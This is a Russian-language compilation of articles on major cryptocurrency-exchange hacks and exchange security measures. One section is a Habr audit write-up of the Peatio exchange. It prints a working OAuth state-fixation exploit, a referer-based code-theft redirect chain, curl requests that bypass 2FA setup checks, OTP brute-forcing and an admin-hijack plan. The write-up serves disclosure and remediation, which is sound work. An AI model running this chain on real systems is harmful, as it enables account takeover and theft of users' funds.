Взлом биржи Bithumb — последняя капля в чаше терпения криптоинвесторов? Взлом биржи
5 крупнейших взломов бирж криптовалют — взломы Poloniex, Bitfinex, Mt Gox и чем помогут децентрализованные биржи?
В этой статье расскажем о наиболее крупных кражах на криптовалютных биржах.
1. Mt. Gox
Mt. Gox – одна из первых торговых площадок на рынке криптовалют — была впервые взломана в июне 2011 г.
Целью хакеров стал аудиторский аккаунт создателя биржи Джеда Маккалеба, который он сохранил после продажи Mt. Gox Марку Карпелесу. По условиям сделки Маккалеб имел право на часть прибыли Mt. Gox в течение полугода после ее продажи. Аудиторский доступ был нужен Джеду, чтобы следить, как соблюдаются его интересы. Тогда в результате взлома хакерам удалось продать и вывести со счетов около 500 000 BTC.
Mt. Gox была окончательно закрыта в феврале 2014 после исчезновения из депозитария и с кошельков пользователей 850 000 BTC. По словам Марка Карпелеса, биржа была вновь атакована хакерами. Злоумышленники якобы использовали лазейку в одном из протоколов, позволявшую менять идентификаторы транзакций и таким образом дважды продавать один и тот же актив. Как позднее выяснило следствие, взлом действительно имел место. Однако украдено было всего 2000 BTC, т. е. лишь малая часть общих потерь. 200 000 BTC обнаружились в марте 2014 года. Карпелес заявил, что они хранились в электронном кошельке старого формата. Что случилось с остальными активами, установить не удалось. 650 000 BTC так и не были найдены.
Согласно основной версии следствия, средства исчезли со счетов Mt. Gox не в 2014, а в период с июня по ноябрь 2011. Причем, по меньшей мере 80 000 BTC существовали только в виде «депозитных» средств — т.е. в качестве обязательств оператора перед клиентами (т.н. частичное резервирование).
2. BitFloor
В сентябре 2012 был взломан другой старожил криптовалютного трейдинга.
31 августа «легли» серверы биржи. Владелец оператора Роман Штильман объяснил неполадки отключением электричества в датацентре и заверил пользователей, что все их средства в безопасности, а торговля скоро возобновится. Однако некоторые клиенты BitFloor получили уведомление следующего содержания: «вероятно, в результате несанкционированного доступа ваши API-ключи были скомпрометированы». Ночью 4 сентября из системы исчезли 24 000 BTC.
Роман Штильман объяснил инцидент так: хакеры завладели незашифрованной резервной копией ключей от «горячего» кошелька, в котором хранилась основная часть средств пользователй. Копия была сделана при очередном обновлении системы.
Штильман сообщил клиентам, что ищет возможности возместить ущерб через продажу доли сторонним инвесторам. Часть потерянных средств действительно была компенсирована, однако весной 2013 банковский оператор биржи в США ликвидировал ее счет, и BitFloor закрылась.
3. Poloniex
Жертвой третьего крупного взлома стал Poloniex. Атака случилась 4 марта 2014.
Точную сумму ущерба компания не сообщает. Однако из заявлений владельца оператора Тристана Д'Агоста можно понять, что хакеры вывели со счетов около 12% от общего объема средств трейдеров или 97 BTC. Детали ограбления в изложении Д'Агоста выглядят так: Хакер обнаружил, что если одновременно разместить несколько запросов на вывод средств, они все будут обработаны примерно в одно и то же время. В результате, хотя баланс кошелька уйдет в минус, записи в реестре будут подлинными. Соответственно, запросы будут автоматически обработаны и выполнены.
The hacker discovered that if you place several withdrawals all in practically the same instant, they will get processed at more or less the same time. This will result in a negative balance, but valid insertions into the database, which then get picked up by the withdrawal daemon.
Детали ограбления в изложении Д'АгостаВскоре после взлома торги на бирже были приостановлены. Оператор объявил, что счета всех пользователей будут «обрезаны» на 12.3%.
Таким образом Poloniex распределила убытки на всех пользователей, избежав панического вывода средств, в результате которого часть трейдеров (а именно 12.3%) могла полностью лишиться своих монет. Poloniex работает по сей день. Д'Агоста заявил, что все потери были полностью компенсированы, а усовершенствованный алгоритм вывода денег не позволяет обрабатывать запросы при отрицательном балансе счета.
Тем не менее, пользователи сообщают, что хакерские атаки на отдельные счета продолжаются:
Источник 1: reddit.com
Источник 2: bitcointalk.org
4. Bitstamp
4 января 2015 года хакеры атаковали словенскую биткоин-биржу Bitstamp. Торги на площадке были приостановлены когда выяснилось, что был взломан один из операционных «горячих» кошельков. Хакеры похитили 19 000 BTC (на тот момент примерно $5 000 000).
Как показало расследование, за несколько недель до инцидента многие сотрудники Bitstamp подвергались фишинговой атаке. Файлы с вредоносным ПО были умело замаскированы под личные электронные письма и сообщения в Skype. Жертвой социального инжиниринга стал сисадмин Лука Кодрич. Молодой человек загрузил файл, присланный, как он считал, организацией, в которую он собирался вступить. Вскоре после инцидента оператор заморозил транзакции, повесив на сайте следующее объявление.
Bitstamp продолжает работать по сей день. Оператору удалось вернуть доверие пользователей, ужесточив меры безопасности: для доступа к кошельку теперь требуется мультиподпись (цифровая подпись нескольких лиц).
5. Bitfinex
Второе место по масштабам ущерба принадлежит Bitfinex. Нападение произошло в августе 2016 года. Сумма похищенного - 120 000 BTC (около $72 млн. на тот момент). В этот раз хакерам удалось воспользоваться уязвимостью в архитектуре системы мультиподписи. В случае Bitfinex для одобрения транзакции требовалось три ключа — два хранились у самой биржи, еще один – у компании BitGo, специализирующейся на безопасности блокчейн-платформ. Задачей BitGo было верифицировать все исходящие транзакции Bitfinex. Таким образом Bitfinex могла сократить объем средств в «холодном» хранении (на «холодных» кошельках), упростив процесс обработки заявок. Хакеры смогли обмануть алгоритмы BitGo, заставив ее одобрить списания средств. Как им удалось это сделать, так и осталось загадкой. BitGo официально сообщила, что их собственные серверы атакованы не были.
В качестве компенсации пострадавшим пользователям Bitfinex выпустила токены, которые конвертировались в доллары согласно графику выплат. На сегодняшний день большинство инвесторов вернули потерянные средства. Bitfinex продолжает работу и числится среди лидеров объемам сделок в паре BTC/USD.
Биржи защищаются
Наученные горьким опытом, биржи стали гораздо серьезнее относиться к безопасности. Продвинутая защита от взломов сегодня — один из главных инструментов построения репутации. Большинство операторов используют как минимум одну, а чаще несколько антихакерских систем. Самая простая и самая распространенная — двухфакторная авторизация. Этот метод контроля широко практикуется в традиционном online-банкинге: для каждой транзакции нужно ввести одноразовый пароль, который высылается на телефон или e-mail клиента. Как показывает практика, двухфакторная авторизация — не самый надежный способ защиты: злоумышленники давно научились взламывать почтовые ящики и дублировать телефонные номера потенциальной жертвы. Более продвинутый вариант двухфакторной авторизации – специальные приложения типа Authy и Authenticator. Они блокируют доступ в систему, если логин и пароль скомпрометированы, запрашивая дополнительный код.
Второй по популярности способ защиты — мультиподпись. Суть этого вида защиты в том, что ключей от биткоин-кошелька не один, а несколько, и они находятся у разных владельцев. Доступ к средствам можно получить только собрав все электронные подписи. Однако, как показала история со взломом Bitfinex, и система мультиподписи может дать сбой. В теории, чтобы украсть деньги, хакеры должны были вскрыть серверы обеих компаний — Bitfinex и BitGo. Как утверждает BitGo, ее «железо» взломано не было. Тем не менее, BitGo автоматически подтверждала все заявки, поступавшие от биржи, то есть от взломавшего ее хакера. Система верификации от BitGo работает и на других популярных биржах, например Kraken и BitStamp. И работает, судя по всему исправно. По крайней мере, ни о каких взломах эти операторы не сообщали. Возможно, дело не в самой мультиподписи, а в ее «кривой» установке. Как считают эксперты, мультиподпись работает только в том случае, когда все «подписанты» независимы друг от друга. В случае Bitfinex BitGo был не просто верифицирующей стороной, но и поставщиком услуг безопасности. Так или иначе, мультиподпись – не панацея и должна дополняться другими рубежами обороны, например лимитами на снятие средств и «холодными» кошельками. Мультиподпись используют Kraken, CEX.io, Bitstamp, Bitfinex, MultiSigna и многие другие биржи.
Горячие и холодные кошельки
Пожалуй, самый надежный способ обороны от хакерских атак — деление средств на два кошелька: «горячий» и «холодный». «Горячий» — рабочий онлайн кошелек, с которого выполняются транзакции. «Холодный» - офлайновое хранилище, где под присмотром охраны на физическом носителе хранятся основные фонды трейдеров. Кроме физической защиты (видеокамеры, вооруженная охрана, сканнер сетчатки глаза и т.п.), «холодный» кошелек может быть оснащен системой мультиподписи. Распределение денег пользователей между кошельками у каждой биржи различное. Чем больше доля в «холодном» хранилище, тем безопаснее. В идеале, все ваши монеты должны попадать в онлайн только в момент транзакции. Но полная безопасность, к сожалению, несовместима с оперативностью. Ищите идеальную для вас пропорцию.
Замки с часовым механизмом
Так называемые Bitcoin Vaults (биткоин клапаны) — это специальные биткоин-адреса, где монеты запираются двухступенчатым защитным механизмом с двумя разными ключами. Чтобы разблокировать средства, нужен обычный цифровой ключ. Однако полный доступ к деньгам откроется только через 24 часа. В течение этих суток любая транзакция может быть отменена введением второго ключа. Есть и еще одна степень защиты: если хакер завладел обоими ключами, биржа может «сжечь» хранившиеся в кошельке средства.
KYC/AML
Эти две аббревиатуры означают политики верификации пользователя. KYC (know your customer - знай своего клиента) – стандартная для финансовых учреждений процедура проверки предоставленной клиентами информации. AML (anti money laundering — соответствие законам об отмывании денег) — тоже стандартная для традиционных финансов процедура проверки источников дохода клиента.
Многие убежденные адепты криптовалют исповедуют идеологию анонимности и децентрализации. Поэтому проверка личных данных, мягко говоря, не входит в их интересы. Однако, если оператору известны данные всех пользователей, биржевая торговля, безусловно, становится безопаснее. Криптовалютные биржи пока не обязаны принимать политики AML/KYC, но некоторые делают это добровольно. Рост бюрократического бремени с лихвой компенсирует имидж легального и надежного оператора. При этом риски минимальны: нарушив правила, оператор не обязан платить огромные штрафы, как делают традиционные финансисты.
Приверженцам анонимной торговли нужно учесть, что любой оператор, не выполняющий нормы AML/KYC, может внезапно стать «законопослушным» и попросить предъявить документы. Так, например, случилось с BitStamp, которая безо всяких (по крайней мере официальных) запросов со стороны властей ограничила анонимный доступ к депозитам и выводу средств со счетов. А BTCChina в один прекрасный день заблокировала пользователям даже вход на свою платформу, потребовав предоставить дополнительную информацию о себе. Не соответствующие требованиям трейдеры полностью потеряли доступ к своим средствам.
Наиболее «законопослушными» считаются две биржи — Coinbase и Bitstamp. Coinbase соблюдает все нормативные документы ЕС и США. Учетная запись пользователя регистрируется только после подтверждения личности по паспорту или водительскому удостоверению. И это еще не все: при создании кошелька оператор требует также данные кредитной карты и фото с веб-камеры. Однако регистрация кошельков на Coinbase доступна резидентам лишь 33 стран, в число которых Россия пока не входит. Торговать через эту площадку можно лишь находясь за пределами РФ, например в США или одной из стран ЕС. Пытаться обмануть оператора, используя прокси-серверы, не рекомендуется. Именно потому что Coinbase серьезно подходит к отчетности, такие попытки могут привести к безвозвратной потере средств.
Bitstamp имеет похожую процедуру регистрации (два документа, удостоверяющих личность и подтверждение адреса проживания — копии счетов за ЖКУ). В апреле 2016 оператор получил разрешение правительства Люксембурга на деятельность на всей территории ЕС. Торговать через эту площадку из России, увы, тоже не получится, по крайней мере легальным путем — без использования прокси-серверов. Доступ на сайт Bitstamp с российских IP заблокирован в январе 2016 г (по решению Роскомнадзора).
Список бирж, принявших политики AML/KYC:
Страхование
Страхование не защитит биржу от взлома, но позволит гарантированно вернуть потерянные средства клиентов. Этот способ защиты особенно распространен в Японии. Например, Mitsui Sumitomo Insurance в партнерстве с Bitflyer страхует от ущерба в результате кибер-хищений, неавторизированного доступа, сбоев торговых программ, ошибок и мошеннических действий сотрудников биржи. Сумма страховых выплат от 10 млн. иен (около $90 тыс.) до 1 млрд. иен. (около $9 млн.). Кроме Bitflyer, со страховщиками сотрудничает другой крупнейший японский оператор Coincheck. Его страховой агент гарантирует компенсацию до 1 млн. иен в случае неавторизированного доступа к учетной записи пользователя, защищенной 2-х ступенчатой аутентификацией.
Децентрализация
Децентрализованные биржи криптовалют — это относительно новый тип бирж. Такие площадки строятся по принципу Р2Р сети. Оператор вообще не хранит ваши коины на своих кошельках. Вместо них для транзакций используются токены-заменители или система временного депонирования с мультиподписью. Пользователи выставляют свои предложения на продажу/покупку, а алгоритм биржи ищет среди них совпадающие пары. Чтобы осуществить сделку, продавец размещает свои монеты на временном депозите. Они разблокируются после подтверждения продавцом платежа от покупателя. Деньги переводятся вне биржи любыми доступными способами (например, обычным банковским переводом).
Второй вариант — биржа выпускает обязательства (токены) которыми обмениваются участники сделки. Когда пользователь хочет вывести свои средства с биржи, токены вновь конвертируются в криптовалюту и пересылаются владельцу.
Выгода децентрализации состоит в том, что вы не обязаны доверять свои средства оператору. Кроме того, децентрализация позволяет сохранять относительную анонимность (если, конечно, вы не пользуетесь для расчетов банковским переводом). Кроме того, у децентрализованных бирж распределенный хостинг, а значит нет рисков «падения» сервера. Но есть у них и свои недостатки Во-первых, суммы транзакций чаще всего ограничены. Во-вторых, на них нет инструментов традиционных бирж: возможности торговать в кредит, делать ставки на рост или падение курса и т. п. К децентрализованным площадкам относятся, например, LocalBitcoins и Bitsquare.
Аудиторы и «белые шляпы»
Хорошим тоном среди операторов стало проводить регулярные аудиты независимыми экспертами и тестирования на проникновение (взлом). Последним занимаются этичные «белые» хакеры или «белые шляпы» (white hat). Цель белых шляп — взломать системы безопасности, чтобы найти потенциальные уязвимости, которыми могут воспользоваться «черные» шляпы, т. е. злоумышленнки. К услугам «белых» шляп прибегает, например, Kraken, о чем активно сообщает в своих рекламных коммуникациях. В качестве аудиторов биржи привлекают непререкаемых авторитетов в криптовалютных технологиях. Например, Coinbase приглашал для проверки одного из ведущих биткоин-предпринимателей, Андреаса Антонополуса. Для операторов это хороший PR-ход. Однако, служат ли такие проверки гарантией безопасности, сказать сложно. Например, обанкротившаяся в результате хакерских атак Mt. Gox в 2011 году пользовалась аудиторскими услугами не менее известного биткоин-инвестора Роджера Вера.
coin.radio
Цена хайпа: как взламывают криптовалютные биржи | Технологии
Как мухи на варенье
Согласно отчету Group-IB, одного из лидеров рынка по кибербезопасности, блокчейн-проекты остаются лакомым куском для тех, кто промышляет разного рода атаками и хищениями. В среднем один ICO проект подвергается атакам как минимум 100 раз. Международные криптовалютные площадки, где оборот средств в разы выше, становятся мишенями злоумышленников ничуть не реже. Только цифры и убытки, как правило, гораздо внушительнее.
Южнокорейская криптовалютная биржа Youbit подвергалась хакерским взломам в апреле и декабре 2017 года. Первый взлом привел к потере около 4000 биткоинов, второй лишил биржу 17% всех активов и привел к закрытию. NiceHash, площадка для покупки, продажи и аренды майнингового оборудования, была взломана в начале декабря 2017 года, общая сумма ущерба — $80 млн. Популярную японскую криптобиржу Coincheck в конце января 2018 года навестили злоумышленники, которым удалось перевести на свои электронные кошельки 523 млн токенов криптовалюты NEM, стоивших на тот момент, примерно $534 млн. А были еще кейсы с биржами Bithumb, Mt. Gox — cписок можно продолжать, как говорят американцы, you name it.
«Количество атак на криптовалютные биржи резко возросло как раз в тот момент, когда сами цифровые валюты начали расти в цене. В декабре 2017 года стоимость Bitcoin достигла $20 000, что не могло не привлечь внимание киберпреступников, — отмечает генеральный директор компании SEC Consult Services Георгий Лагода. — При этом уровень защиты этих площадок против кибератак оказался недостаточно высоким, чтобы предотвратить миллионные потери».
Ловись, биржа, большая и маленькая
В чем уязвимость блокчейна при кибератаке? Во-первых, разработчики неверным образом зачастую полагают, что слова «крипто» и «блокчейн» означают безопасность по умолчанию. «Должное внимание не уделяется ни качеству кода, ни сетевой архитектуре, — замечает Георгий Лагода, — а ведь они могут быть уязвимы. Отдельного внимания заслуживает безопасность смарт-контрактов. И здесь зачастую полагаются на безопасность структуры блокчейна, упуская из виду небезопасное использование генераторов псевдослучайных чисел, используя данные из основной сети Bitcoin или аналогичных валют в качестве источника случайной величины».
В феврале специалисты подсчитали, что из миллиона смарт-контрактов Ethereum уязвимостями обладают более 34 000. Исследователи из Университетского Колледжа Лондона проверили свои предположения на 3000 смарт-контрактах блокчейна Ethereum. 89% из них оказались носителями тех или иных багов, что теоретически позволило бы украсть эфиров на сумму $6 млн.
Самыми популярными атаками на сегодняшний день являются атаки типа DDoS и фишинг.
В целом, аббревиатура DDoS (Distributed Denial of Service — распределенный отказ в обслуживании) уже давно украшает сводки новостей и вызывает трепет пользователей. При такой атаке хакеры направляют на сервер искусственно созданный трафик, имеющий несколько источников, чтобы создать для сервера непосильную нагрузку, и «кладут» его. В этом случае биржи также теряют деньги, ведь при отсутствии доступа, особенно длительного, пользователи биржи не могут использовать ее функции, и капитал не движется. Криптовалютная биржа Bitfinex в декабре 2017 года подверглась мощнейшей атаке такого рода.
Фишинг (phishing) — мошенничество, основанное на принципах социальной инженерии. Сначала создается практически точная копия сайта, например, выбранной злоумышленниками биржи. Затем при помощи спам-технологий рассылается письмо, составленное таким образом, чтобы быть максимально похожим на настоящее письмо от биржи.
Почти в точности повторяются логотипы, имена и фамилии реальных руководителей. Сообщается о том, что из-за смены программного обеспечения или — вот ирония! — из-за нападения хакеров пользователю необходимо подтвердить или изменить свои учетные данные. Во всех случаях цель таких писем одна — заставить пользователя нажать на приведенную ссылку, а затем ввести свои конфиденциальные данные на ложном сайте. Пользователи популярной криптовалютной биржи Binance несколько недель назад стали жертвами таких трюкачей, причем отличить настоящий сайт от фейка невооруженным глазом было почти невозможно.
Поэтому красной линией любых списков рекомендаций от экспертов всегда проходит заклинание: не хранить значительные средства на биржах и использовать эти площадки только для сделок. «Атаки на ICO — те вообще происходят постоянно, — утверждает Евгений Юртаев, директор финтех-компании Zerion, производителя программного обеспечения. — Один из самых частых примеров — спуфинг, когда злоумышленники получают доступ к DNS сайта и перенаправляют его на несуществующий домен. От такой атаки пострадала, например, Enigma, когда на поддельном сайте выставили адрес, куда надо было отправлять эфиры, и было украдено больше $500 000. Общей рекомендацией остается не хранить крупные суммы денег на централизованных биржах и по возможности использовать децентрализованные альтернативы, которые набирают ликвидность».
Щит, меч и регистрация
Что делать? Существует способ приблизить размер рисков к нулю: проведение внутренних и внешних аудитов информационной безопасности, постоянный мониторинг активности пользователей и использование рекомендованных экспертами решений. Существует, например, чаще других используемый аудиторами международный стандарт CobiT (Control Objectives for Information and related Technology).
Одна из основ блокчейна — использование смарт-контракта. Его всесторонний аудит также нужно проводить в обязательном порядке. Отличие от «обычной» защиты информации в критичности системы и объеме денег, который постоянно крутится в проекте, а также в своей логике работы системы.
Чтобы защитить своих пользователей, бирже нужно прежде всего защитить себя. Самым распространенным решением является использование двухфакторной аутентификации (2FA) и «холодных» серверов.
Некоторые биржи идут дальше и просят пользователей предоставить копии документов. Например, на Bittrex требуется верификация аккаунта с указанием персональных данных для вывода цифровой валюты общим объемом до 3 биткоинов в день. При выводе до 100 биткоинов в день — с предоставлением копии удостоверения личности. Кроме того, основная часть всех цифровых активов биржи хранится офлайн на «холодных», то есть физически не подключенных ни к какому компьютеру, носителям и выводится онлайн только при совершении транзакций.
Также существуют процедуры AML (Anti Money Laundering — борьба с отмыванием денег) и КУС (Know Your Client — знай своего клиента), которые биржи объявляют обязательными.
Ключ от квартиры, где деньги лежат
Говорят, что существует три вида лжи: ложь во благо, отъявленная ложь и статистика. Так вот, статистика говорит, что на 1000 строк исходного кода в среднем насчитывается 1 ошибка. И нет никакой уверенности, что именно этот баг не будет связан с безопасностью.
Как утверждают эксперты по кибербезопасности, даже если разработчики биржи напишут идеальный код, всегда остается риск, что в сторонних проектах, которые им приходится использовать, будут уязвимости.
«Поскольку любая биржа, и не только криптовалютная, это «про деньги», отдельное место в общем спектре атак играют атаки, основанные на социальной инженерии. А также, как ни удивительно, случайные события, причиной которых служат обычная человеческая глупость и невнимательность. Рядовые пользователи — часто большие любители слабых паролей, потерянных «холодных» кошельков, использования «горячих» кошельков и публичного Wi-Fi для доступа к большому объему средств, перехода по подозрительным ссылкам», — описывает распространенные ошибки Георгий Лагода.
В конечном итоге пользователь или площадка, у которых украли средства тем или иным способом, вынуждены рассчитывать лишь на честность хакеров, так как в отличие от традиционной финансовой среды алгоритмы возмещения утраченных средств в криптосфере не отработаны. Если хакеры взломают ваш банковский счет и уведут с него значительную сумму денег, то банк может отследить и аннулировать криминальные транзакции, возместив ущерб. Компенсация украденной криптовалюты проблематична или просто невозможна по технологическим причинам и в силу анонимности транзакций. Тем более любопытно выглядит история неизвестного Робина Гуда хакерского происхождения, который по неизвестной причине вернул $26 млн в токенах Ethereum в лоно ограбленной им в прошлом году биржи CoinDash. Рассчитывать на подобный альтруизм в большинстве случаев не приходится. Поэтому стоит помнить:
— во-первых, и у хайпа есть цена;
— во-вторых, безопасность, как всегда, превыше всего.
www.forbes.ru
Взлом биткоин биржи на Rails / Хабр
В последнее время появилась масса биткоин сервисов. И то что раньше было проектом «for fun» неожиданно стало хранить десятки и даже сотни тысяч долларов. Цена биткоина выросла, но уровень безопасности биткоин сервисов остался таким же низким.Ради портфолио мы провели бесплатный аудит биткоин биржи с открытым кодом Peatio использующей Ruby on Rails. Репорт в pdf можно скачать тут. Самое интересное что в результате нашлись не очередные унылые рейс кондишены или SQLi, а довольно таки любопытная цепочка багов ведущая к угону аккаунта и краже существенной части горячего кошелька.
Угон аккаунта
В глаза сразу бросается «Вход через Weibo» (это у китайцев популярная социалка). Если почитать шпаргалку по безопасности OAuth становится очевидно, там где OAuth там и угон аккаунта.
Присоединение Вейбо атакующего к аккаунту жертвы В omniauth-weibo-oauth3 был баг фиксирующий state. state это важный параметр для защиты от CSRF, и защита от него была встроена (не сразу, конечно) в omniauth. Вот только строчка
session['omniauth.state'] = params[:state] if v == 'state' выключала эту защиту, вставляя в session['omniauth.state'] значение из GET параметра. Теперь можно зафиксировать state=123 и использовать code выпущенный для вейбо атакующего. Пример эксплуатации:require 'sinatra' get '' do conn = Faraday.new(:url => 'https://api.weibo.com') new_url = conn.get do |r| r.url "/oauth3/authorize?client_id=456519107&redirect_uri=https%3A%2F%2Fyunbi.com%2Fauth%2Fweibo%2Fcallback&response_type=code&state=123" r.headers['Cookie'] =<<COOKIE YourWeiboCookies COOKIE r.options.timeout = 4 r.options.open_timeout = 2 end.headers["Location"] redirect new_url end get '/peatio_demo' do response.headers['Content-Security-Policy'] = "img-src 'self' https://yunbi.com" "<img src='https://yunbi.com/auth/weibo?state=123'><img src=''>" end В результате мы имеем вейбо атакующего подключенным к аккаунты жертвы на бирже, и можем в него зайти напрямую.А если Вейбо уже подключен у жертвы? Второй аккаунт подключить нельзя, поэтому надо найти способ украсть code для текущего вейбо жертвы. Вейбо не привязывает code к redirect_uri (что само по себе грубая ошибка, но зарепортить китайцам я не смог) а значит найдя страницу сливающую код через рефереры мы достигнем цели. Поиски такой страницы как и опен редиректа не увенчались успехом, но в самом конце интересная строчка в DocumentsController спасла положение:
if not @doc redirect_to(request.referer || root_path) return end Если документ не найден то происходит редирект на request.referer, а значит следующая цепочка редиректов сольет код:1. attacker_page редиректит на weibo.com/authorize?...redirect_uri=http://app/documents/not_existing_doc%23… 2. Weibo неправильно парсит redirect_uri c %23 и редиректит жертву на app/documents/not_existing_doc#?code=VALID_CODE 3. Peatio не может найти not_existing_doc и возвращает Location заголовок равный текущему request.referer который все еще attacker_page (браузер его продолжает слать с самого начала) 4. Браузер копирует фрагмент #?code=VALID_CODE и загружает attacker_page#?code=VALID_CODE. Теперь код на странице может прочитать VALID_CODE через location.hash и загрузить настоящий app/auth/weibo/callback?code=VALID_CODE чтобы зайти в аккаунт жертвы на бирже.
Итак, мы угнали аккаунт у пользователей с Вейбо и даже без. Но дальше нас останавливает двух-факторная аутенфикация.
Обход 2FA
Peatio из коробки заставляет всех пользователей использовать Google Authenticator и/или SMS коды для важных функций (вывод биткоинов). А значит нам так или иначе нужно найти способ обхода.Если у жертвы включен только Google Authenticator В SmsAuthsController была серьезная ошибка — фильтр two_factor_required! вызывался только для экшена show, но не для экшена update который то и был ответственен за подключение SMS 2FA.before_action :auth_member! before_action :find_sms_auth before_action :activated? before_action :two_factor_required!, only: [:show] def show @phone_number = Phonelib.parse(current_user.phone_number).national end def update if params[:commit] == 'send_code' send_code_phase else verify_code_phase end end А значит минуя запросы на show мы шлем запросы напрямую в update: curl ‘http://app/verify/sms_auth’ -H ‘X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=’ -H ‘Cookie:_peatio_session=SID’ –data ‘_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5B phone_number%5D=9123222211&commit=send_code’ curl ‘http://app/verify/sms_auth’ -H ‘X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=’ -H ‘Cookie:_peatio_session=SID’ –data ‘_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5B phone_number%5D=9123222211&sms_auth%5Botp%5D=CODE_WE_RECEIVED’ При подключении SMS 2FA мы можем получать коды на наш номер и выводить биткоины на свой адрес.Если у жертвы SMS и Authenticator Если жертва-параноик подключила оба метода 2FA то работа становится чуть сложнее. Система уязвима к брутофорсу 2FA кодов, другими словами её очень легко обойти. В отличии от обычного пароля, где 36^8+ вариантов, в одноразовом коде всего 1 миллион вариантов. Трех дней достаточно чтобы спокойно его угадать. Можете посчитать на OTP Bruteforce Calculator сами: Без защиты от брута 2FA не имеет смысла, вот прямо совсем. Распространенное заблуждение, кстати, что 30-секундное окно делает брутофорс сложнее. На самом деле разницы практически нет, что 1 секунду что 24 часа этот код активен, 3 дня будет достаточно.
Если только SMS 2FA Это выглядит как самый сложный вариант — ведь брутофорсить незаметно не получится и жертва сразу заметит подозрительные SMS на свой номер. Однако, очередная ошибка в коде нам поможет:
def two_factor_by_type current_user.two_factors.by_type(params[:id]) end В данном методе не используется скоуп «activated» а значит можно продолжать брутофорсить 2FA типа Google Authenticator как и в предыдущем случае, несмотря на то что он никогда не был активирован, ведь seed у него уже сгенерирован!Атакуем админа
Теперь когда мы научились угонять и обходить 2FA для любого пользователя попробуем применить полученный эксплоит с умом. Мы не будем охотиться за юзерами, а сразу напишем такой тикет админу «What is wrong with my account can you please check? i.will.hack.you/now». После посещения этой страницы наш скрипт угонит админский аккаунт. К сожалению, выяснилось что админ практически ничего не может. Нет функций «послать все биткоины на Х» или «добавить У биткоинов этому юзеру». Единственная зацепка это возможность одобрения фиат депозитов сделанных юзерами. А значит мы можем создать депозит на много денег и сами его одобрить: Дальше мы можем скупить все доступные на ордерах биткоины и моментально их вывести (моментально только потому что мы и есть админ и сами же одобрим свой Withdraw запрос, выводы в обменке делаются вручную!). Но куда больше профита имхо принесет вариант когда мы будем тихонько пить кровь из биржи неделю-другую.Мораль:
1. Никогда не добавляйте вход через социалки в важные сайты. В них есть слишком много идеологических изъянов, поэтому лучше вообще не связываться. 2. Если уж и решили делать двух-факторную авторизацию, делайте правильно с самого начала — четко проследите порядок действий для добавления нового метода и предотвратите брутофорс путем блокировки аккаунта после N попыток. 3. Создавайте отдельного Суперадмина с функцией вливания произвольного числа денег в систему. Он не должен иметь возможности читать тикеты и вообще этот аккаунт надо хранить как зеницу ока.Спасибо за внимание, и если вы хотите обезопасить свой сервис, вы знаете к кому обратиться.
habr.com
Взлом биржи Bithumb — последняя капля в чаше терпения криптоинвесторов?
Там, где есть деньги, всегда есть мошенники и грабители. Если речь идет о криптоактивах, значит, поблизости наверняка и хакеры. Взломы криптовалютных бирж, следующие один за другими, заставили пользователей криптоактивов задуматься над тем, как позаботиться о сохранности своих средств, стоит ли доверять криптобиржам и что делать, чтобы избежать неприятных инцидентов?В результате взлома южнокорейской биржи Bithumb было украдено свыше $30 млн, до этого атакам хакеров подверглись японская биржа Coincheck, итальянская площадка Bitgrail, корейская Coinrail — список можно продолжать и дальше… Рынок криптовалют не может не реагировать на подобные события, поэтому держатели криптовалюты были вынуждены наблюдать за тем, как на фоне негативных новостей проседает криптовалюта. На сегодняшний день Биткоин продемонстрировал падение на 70% относительно своих максимумов в прошлом году.
Чтобы понять, как искоренить проблему, ProBitcoin обратился к экспертам, которые высказали свое мнение относительно того, как поступить криптоэнтузиастам и что будет с биржами в дальнейшем. По мнению финансового консультанта Teletrade (ООО «ТелетрейдБел») Михаила Грачева, вместе с тем, как совершенствуется технология майнинга и сами криптоактивы, не дремлют и хакеры, которые придумывают все новые технологии, помогающие взламывать торговые площадки и красть средства пользователей. «Это будет вечная гонка, которой по всей видимости не будет конца. Кто-то майнит криптоактивы и занимается их оборотом на криптобиржах, а кто-то предпочитает взламывать кошельки, счета и похищать активы. Регулирование в этой области находится в стадии разработки, поэтому единственное, что могут предложить криптобиржи пострадавшим инвесторам – это компенсировать их потери из собственных средств. Но возможности площадок не безграничные, поэтому ситуации, когда японская биржа Mt Gox, которая в 2014 году стала мишенью хакеров (потери составили 850 тысяч Биткоинов, была вынуждена объявить о банкротстве), будут повторяться. Восстановить доверие к крипторынку, вероятно, можно путем государственного регулирования. Но это то, от чего принципиально дистанцируются адепты блокчейна, акцентируя внимание на децентрализации технологии. Поэтому тем, что жаждет цифровой свободы, придется мириться с вероятностью хищения их монет такими же умными коллегами, кто стоит по другую сторону баррикад», — убежден Михаил Грачев.
Придерживается похожего мнения и эксперт «Международного финансового центра» Ольга Прохорова. Она уверена, что взломы — это сигналы о том, чтобы площадки начали формировать лучшую защиту. Однако взломы не являются единственным камнем преткновения в положительном отношении к криптовалютам, так как всегда найдутся трейдеры, которые ясно осознают, на какие риски они идут. По мнению Ольги, не только ненадежность вложений, но и отсутствие внятного регулирования и соответственно понимания того, кто несет ответственность в случае возникновения спорных ситуаций, — основная проблема в формировании положительного отношения к криптовалютам.
«После взлома Bithumb вновь стали актуальными давно известные постулаты: никогда не храните деньги на криптобиржах, только на холодном кошельке. Соблюдайте осторожность при торговле, не используйте один и тот же пароль для разных аккаунтов на разных биржах. Ведь в случае утечки данных, злоумышленники «прогоняют» полученную базу логинов и паролей по всем биржам, и в случае, если у инвестора везде одинаковые пароли, итог понятен — потеря всех средств на всех счетах. Bithumb пообещала возместить инвесторам все потери — это достойный уважения поступок. Именно подобные шаги помогают восстановить доверие и к бирже, и к отрасли в целом. Скорее всего, в будущем на рынке останутся лишь самые крупные биржи, которые будут более защищены от взлома и более безопасны, а значит, именно они будут пользоваться большим доверием пользователей, туда и пойдут инвесторы. Не исключено, что это будут именно те биржи, которые сотрудничают с регуляторами», — считает Ольга Прохорова.
